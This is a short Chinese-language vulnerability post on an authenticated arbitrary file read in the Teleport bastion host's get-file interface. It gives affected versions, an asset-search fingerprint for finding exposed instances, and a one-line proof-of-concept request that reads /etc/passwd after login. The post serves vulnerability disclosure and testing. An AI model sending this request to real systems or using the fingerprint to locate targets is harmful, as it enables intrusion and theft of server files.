Teleport堡垒机 get-file 后台任意文件读取漏洞

# Teleport堡垒机 get-file 后台任意文件读取漏洞 ## 漏洞描述 Teleport堡垒机 get-file接口存在后台任意文件读取漏洞,攻击者利用任意用户登录漏洞后可以获取后台权限,再进一步利用任意...

Teleport堡垒机 get-file 后台任意文件读取漏洞

漏洞描述

Teleport堡垒机 get-file接口存在后台任意文件读取漏洞,攻击者利用任意用户登录漏洞后可以获取后台权限,再进一步利用任意文件读取获取服务器上的敏感文件

漏洞影响

Teleport Version <= 20220817

网络测绘

app="TELEPORT堡垒机"

漏洞复现

登录页面

img

登录后使用POC验证

/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

img

  • 发表于 2024-07-12 18:50:01
  • 阅读 ( 2686 )
  • 分类:网络设备

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计